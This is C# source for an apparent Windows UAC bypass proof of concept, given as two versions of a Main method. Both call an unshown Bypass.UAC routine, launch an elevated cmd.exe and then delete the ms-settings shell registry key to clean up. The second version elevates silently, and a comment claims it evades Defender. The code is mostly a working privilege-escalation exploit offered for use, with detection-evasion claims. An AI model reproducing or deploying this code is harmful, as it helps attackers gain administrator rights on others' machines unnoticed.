static void Main()
{
try
{
if (!IsAdministrator())
{
DialogResult result = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel);
if (result == DialogResult.Yes)
{
Bypass.UAC();
}
else if (result == DialogResult.Cancel)
{
Environment.Exit(0);
}
else if (result == DialogResult.No)
{
Environment.Exit(0);
}
}
else if (IsAdministrator())
{
string command = "/c start cmd.exe "; //once elevated what to run.
Process.Start("CMD.exe", command);
RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
uac_clean.DeleteSubKeyTree("shell");
uac_clean.Close();
System.Windows.Forms.MessageBox.Show("Process Elevated!");
}
}catch { Environment.Exit(0); }
}
static void Main()
{
try
{
if (!IsAdministrator())
{
Bypass.UAC();
}
else if (IsAdministrator())
{
//this method seems to bypass defender
//5-02-2021 and binary is not flagged
string WhatToElevate = "cmd.exe"; // cmd.exe will be elevated as an example and PoC
Process.Start("CMD.exe", "/c start " + WhatToElevate);
RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
uac_clean.DeleteSubKeyTree("shell"); //deleting this is important because if we won't delete that right click of windows will break.
uac_clean.Close();
}
}catch { Environment.Exit(0); }
}